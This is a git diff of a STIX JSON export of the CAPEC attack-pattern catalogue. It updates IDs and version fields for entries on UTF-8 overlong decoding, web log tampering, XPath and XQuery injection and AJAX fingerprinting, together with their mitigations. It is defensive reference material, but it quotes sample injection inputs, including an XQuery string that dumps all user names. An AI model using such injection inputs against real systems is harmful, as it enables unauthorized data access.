"course-of-action--350608e5-b827-4677-bc83-9c11423a7713" + "id": "course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6558fc41-dffd-4a35-a0af-abf79307a731", - "source_ref": "course-of-action--350608e5-b827-4677-bc83-9c11423a7713", + "id": "relationship--2294febb-9f8b-40a6-911c-f9b179522be3", + "source_ref": "course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5bc3ffec-6c84-4573-8f60-3e19e0b0eb80" + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-80-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ", "type": "course-of-action", - "id": "course-of-action--46e2a452-50ef-4f56-b977-182120c90dc4" + "id": "course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--95514cd8-16af-4f21-b84e-c6d8e0843d0d", - "source_ref": "course-of-action--46e2a452-50ef-4f56-b977-182120c90dc4", + "id": "relationship--cc1c02e5-b81a-4280-874b-987523b1eb0d", + "source_ref": "course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5bc3ffec-6c84-4573-8f60-3e19e0b0eb80" + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-80-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "For security reasons, a UTF-8 decoder must not accept UTF-8 sequences that are longer than necessary to encode a character. If you use a parser to decode the UTF-8 encoding, make sure that parser filter the invalid UTF-8 characters (invalid forms or overlong forms).", "type": "course-of-action", - "id": "course-of-action--cda8e4a3-dda6-48cb-8311-d39d5a1d824a" + "id": "course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--16256863-7f17-456d-90ac-7e622b594df2", - "source_ref": "course-of-action--cda8e4a3-dda6-48cb-8311-d39d5a1d824a", + "id": "relationship--46deae11-cdef-4ff0-8112-dd2ef024dfc4", + "source_ref": "course-of-action--e88fd775-8949-41b9-a6c5-cdd3b5ac5118", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5bc3ffec-6c84-4573-8f60-3e19e0b0eb80" + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-80-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Look for overlong UTF-8 sequences starting with malicious pattern. You can also use a UTF-8 decoder stress test to test your UTF-8 parser (See Markus Kuhn's UTF-8 and Unicode FAQ in reference section)", "type": "course-of-action", - "id": "course-of-action--7e0dfcaa-f9b9-4304-adab-d3efa0fd0d10" + "id": "course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6dba91f5-6eff-4cef-a04b-04a59c4c2cc5", - "source_ref": "course-of-action--7e0dfcaa-f9b9-4304-adab-d3efa0fd0d10", + "id": "relationship--feb130f4-7a68-43cd-9a77-10d60e95475f", + "source_ref": "course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5bc3ffec-6c84-4573-8f60-3e19e0b0eb80" + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--75f7d1f1-fd21-4a5f-acc6-a2a8418e0c1e", - "source_ref": "course-of-action--e30069ef-47f0-4bad-a1ca-881c17cd8c30", + "id": "relationship--caa76434-7cae-42ce-9634-01b8f7882546", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--5bc3ffec-6c84-4573-8f60-3e19e0b0eb80" + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3" }, { "name": "Web Logs Tampering", "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -43806,68 +44521,69 @@ "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--bfdb8acb-cdc5-469c-8156-681df73089a4" + "id": "attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-81-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use input validation before writing to web log", "type": "course-of-action", - "id": "course-of-action--6bc454e5-7068-4918-96a5-bc79e850b68c" + "id": "course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ded8f629-c9d8-4908-9f3a-45f6739a1749", - "source_ref": "course-of-action--6bc454e5-7068-4918-96a5-bc79e850b68c", + "id": "relationship--1e708afb-208f-4166-a11b-40342db93818", + "source_ref": "course-of-action--dbc2eaec-3912-4414-a6ca-c88c494ad97c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bfdb8acb-cdc5-469c-8156-681df73089a4" + "target_ref": "attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-81-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Validate all log data before it is output", "type": "course-of-action", - "id": "course-of-action--46ff0623-5f7a-480b-aa07-934171832f23" + "id": "course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3e27deed-b6fe-4ef7-a7ed-141027d807f5", - "source_ref": "course-of-action--46ff0623-5f7a-480b-aa07-934171832f23", + "id": "relationship--77c41198-2391-422c-81fa-0ae498f0d2bf", + "source_ref": "course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--bfdb8acb-cdc5-469c-8156-681df73089a4" + "target_ref": "attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e" }, { - "name": "Violating Implicit Assumptions Regarding XML Content (aka XML Denial of Service (XDoS))", - "description": "This attack pattern has been deprecated as it a generaltion of CAPEC-230: XML Nested Payloads, CAPEC-231: XML Oversized Payloads, and CAPEC-147: XML Ping of Death. Please refer to these CAPECs going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "name": "DEPRECATED: Violating Implicit Assumptions Regarding XML Content (aka XML Denial of Service (XDoS))", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads, CAPEC-231: XML Oversized Payloads, and CAPEC-147: XML Ping of Death. Please refer to these CAPECs going forward.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -43877,15 +44593,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--34226cc1-1df4-4840-ad8e-c1fc642b45a2" + "id": "attack-pattern--556e35d3-137d-4102-b2e6-ba28a05736cd" }, { "name": "XPath Injection", "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that he normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -43950,78 +44667,79 @@ "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--08d166fc-b704-4ada-8abc-d1004c9c3bf1" + "id": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-83-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.", "type": "course-of-action", - "id": "course-of-action--be7ce0b0-d884-42ae-a507-462da83f5648" + "id": "course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--aa3f7f36-5e5f-4991-b352-108a5d5f5e8e", - "source_ref": "course-of-action--be7ce0b0-d884-42ae-a507-462da83f5648", + "id": "relationship--74bd61aa-f7c8-4f10-8a1c-33adc298bc27", + "source_ref": "course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--08d166fc-b704-4ada-8abc-d1004c9c3bf1" + "target_ref": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-83-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.", "type": "course-of-action", - "id": "course-of-action--a635dac4-af6b-4c89-8075-286bccbde6d1" + "id": "course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8cb0ef96-e317-4181-bb9b-23a5fff76d54", - "source_ref": "course-of-action--a635dac4-af6b-4c89-8075-286bccbde6d1", + "id": "relationship--81305fb7-b358-42db-818e-1ffe0161cd24", + "source_ref": "course-of-action--9b398789-71b2-4867-987f-2cfaabfdac3a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--08d166fc-b704-4ada-8abc-d1004c9c3bf1" + "target_ref": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d1afac48-e76c-4c76-90b1-6dc6aacd889b", - "source_ref": "course-of-action--6f84cd30-2b82-4135-816d-792e356126ea", + "id": "relationship--59760aef-867c-4ae8-b3ad-56fae9788f7a", + "source_ref": "course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301", "relationship_type": "mitigates", - "target_ref": "attack-pattern--08d166fc-b704-4ada-8abc-d1004c9c3bf1" + "target_ref": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8" }, { "name": "XQuery Injection", "description": "This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -44080,65 +44798,66 @@ "\n An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.\n doc(accounts.xml)//user[Name='*']\n The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b8f663f5-b3e0-43d7-961e-cbe3bd34093b" + "id": "attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-84-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Perform input white list validation on all XML input", "type": "course-of-action", - "id": "course-of-action--3e039130-8761-4bc6-8625-b73a365a0462" + "id": "course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5c91d756-5bd1-4764-b0d7-ef6eb6118510", - "source_ref": "course-of-action--3e039130-8761-4bc6-8625-b73a365a0462", + "id": "relationship--be4ac31b-9a45-48cb-8545-c040b42c44c7", + "source_ref": "course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b8f663f5-b3e0-43d7-961e-cbe3bd34093b" + "target_ref": "attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-84-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL.", "type": "course-of-action", - "id": "course-of-action--ff244550-1d66-4529-9422-38acc9af2957" + "id": "course-of-action--847153ab-45d7-433c-877d-91be6e450830" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--093f7736-5579-4455-bb68-b82afe34e2a6", - "source_ref": "course-of-action--ff244550-1d66-4529-9422-38acc9af2957", + "id": "relationship--ede2474f-657d-48e4-a372-3ac38faf2123", + "source_ref": "course-of-action--847153ab-45d7-433c-877d-91be6e450830", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b8f663f5-b3e0-43d7-961e-cbe3bd34093b" + "target_ref": "attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20" }, { "name": "AJAX Fingerprinting", "description": "This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. In many XSS attacks the attacker must get a \"hole in one\" and successfully exploit the vulnerability on the victim side the first time, once the client is redirected the attacker has many chances to engage in follow on probes, but there is only one first chance. In a widely used web application this is not a major problem because 1 in a 1,000 is good enough in a widely used application. A common first step for an attacker is to footprint the environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -44223,106 +44942,107 @@ "Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. By appending a malicious script to an otherwise normal looking URL, the attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute additional javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks)." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "id": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7b0f36a0-a488-45e9-80ff-90a6b34425fe", - "source_ref": "course-of-action--d8c851f4-9464-4d22-b6a5-8e817e3754d1", + "id": "relationship--98898885-8ffc-419e-b0ce-9e8f33f19b3c", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dffa3c63-71e2-4e92-bf28-49055559200f", - "source_ref": "course-of-action--a837738e-a076-4304-b906-9664bc087b5e", + "id": "relationship--01c1eecc-d340-4af5-b4bd-b6e2212b2919", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--96cffc1c-57eb-4fba-a2df-1d74d81a5c46", - "source_ref": "course-of-action--f3bd3d55-f25e-4bff-b92b-5a1b421a1975", + "id": "relationship--86d3766f-0a05-43b2-b51d-b7f6759dd217", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--3b1752b9-6701-4d0d-8733-c9226ab8c0a3" + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d301e7f6-70ed-4956-928c-d4e2b0fc283f", - "source_ref": "course-of-action--973c207c-2784-4f0c-98e8-0ac062857549", + "id": "relationship--f5b48029-c434-4493-8aed-e71719117926", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", 